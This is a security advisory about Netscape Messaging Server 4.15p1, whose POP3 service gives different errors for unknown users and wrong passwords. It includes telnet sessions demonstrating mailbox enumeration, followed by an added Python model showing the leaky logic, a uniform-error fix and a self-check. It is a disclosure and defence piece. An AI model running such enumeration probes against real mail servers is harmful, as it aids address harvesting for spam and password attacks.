Netscape Messaging Server reveals information (error handling)
------------------------------------------------------------------------

SUMMARY

<http://www.iplanet.com/products/infrastructure/messaging/n_mess/>

Netscape Messaging Server is a carrier-grade, high-performance messaging
solution that delivers superior scalability, performance, and
administration. The product contains a vulnerability that allows remote
attackers to find out whether the supplied username was wrong or whether
the supplied password was wrong. This leaks sensitive information: a
server should normally give no indication of whether a username is valid.

DETAILS

Vulnerable systems:
 * Netscape Messaging Server (a.k.a. iPlanet Messaging Server) 4.15p1

The problem is that the POP3 server displays a different message for an
authentication error due to an invalid password than for one due to an
invalid username. This could be used to "harvest" email addresses for
spam lists, or for other forms of attack.

Example:
The account test.user has been created, while the account invalid.user
does not exist.

$ telnet someserver.example.com 110
Trying 172.16.10.107...
Connected to someserver.example.com (172.16.10.107).
Escape character is '^]'.
+OK someserver.example.com POP3 service (Netscape Messaging Server 4.15 Patch 1 (built Mar 15 2000))
USER test.user
+OK Name is a valid mailbox
PASS blah
-ERR Password incorrect
quit
+OK
Connection closed by foreign host.

$ telnet someserver.example.com 110
Trying 172.16.10.107...
Connected to someserver.example.com (172.16.10.107).
Escape character is '^]'.
+OK someserver.example.com POP3 service (Netscape Messaging Server 4.15 Patch 1 (built Mar 15 2000))
user invalid.user
+OK Name is a valid mailbox
PASS blah
-ERR User unknown
quit
+OK
Connection closed by foreign host.

--
Eko Sulistiono
MIKRODATA & AntiVirus Media
Web: http://www.mikrodata.co.id/
WAP: http://www.mikrodata.co.id/wap/index.wml

This message contains no viruses. Guaranteed by AVP.
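The following is an added example and not code from the advisory or from the Netscape/iPlanet product. It models the POP3 USER/PASS step in memory: `leaky_pop3_auth` reproduces the distinguishable replies quoted above, `uniform_pop3_auth` shows the usual fix (one failure string whichever credential is wrong), and `distinguishes_users` is a self-check an operator can run against a handler to confirm that the reply no longer discloses whether a mailbox exists. Mailbox names, passwords and the reply strings of the hardened variant are constructed sample values.

```python
# Added example (not the advisory's own code): an in-memory model of the
# POP3 USER/PASS authentication step, showing the leaky response logic the
# advisory describes beside a uniform-error variant, plus a self-check that
# tells the two apart. MAILBOXES is constructed sample data.

# Constructed sample mailbox store: username -> password.
MAILBOXES = {"test.user": "s3cret"}


def leaky_pop3_auth(user: str, password: str) -> str:
    """Model of the behaviour quoted in the advisory: the failure message
    differs depending on whether the mailbox exists."""
    if user not in MAILBOXES:
        return "-ERR User unknown"
    if MAILBOXES[user] != password:
        return "-ERR Password incorrect"
    return "+OK Maildrop ready"


def uniform_pop3_auth(user: str, password: str) -> str:
    """Hardened variant: a single failure string regardless of which
    credential was wrong, so the reply alone does not confirm that a
    mailbox exists. (Reply text is a constructed sample.)"""
    # Look the user up and compare in every case so both failure paths
    # take the same route; timing side channels are a separate concern.
    known = user in MAILBOXES
    stored = MAILBOXES.get(user, "")
    if known and stored == password:
        return "+OK Maildrop ready"
    return "-ERR Authentication failed"


def distinguishes_users(auth, valid_user: str, invalid_user: str,
                        bad_password: str = "blah") -> bool:
    """Self-check for an authentication handler: returns True when a wrong
    password on an existing mailbox and a wrong password on a missing
    mailbox produce different replies, i.e. when the reply leaks
    mailbox existence."""
    reply_existing = auth(valid_user, bad_password)
    reply_missing = auth(invalid_user, bad_password)
    return reply_existing != reply_missing


if __name__ == "__main__":
    for name, handler in (("leaky", leaky_pop3_auth),
                          ("uniform", uniform_pop3_auth)):
        leaks = distinguishes_users(handler, "test.user", "invalid.user")
        print(f"{name}: discloses mailbox existence = {leaks}")
```

Running the block reports `leaky: discloses mailbox existence = True` and `uniform: ... = False`; the same `distinguishes_users` check can be pointed at any other handler that takes a username and password and returns the server's reply string.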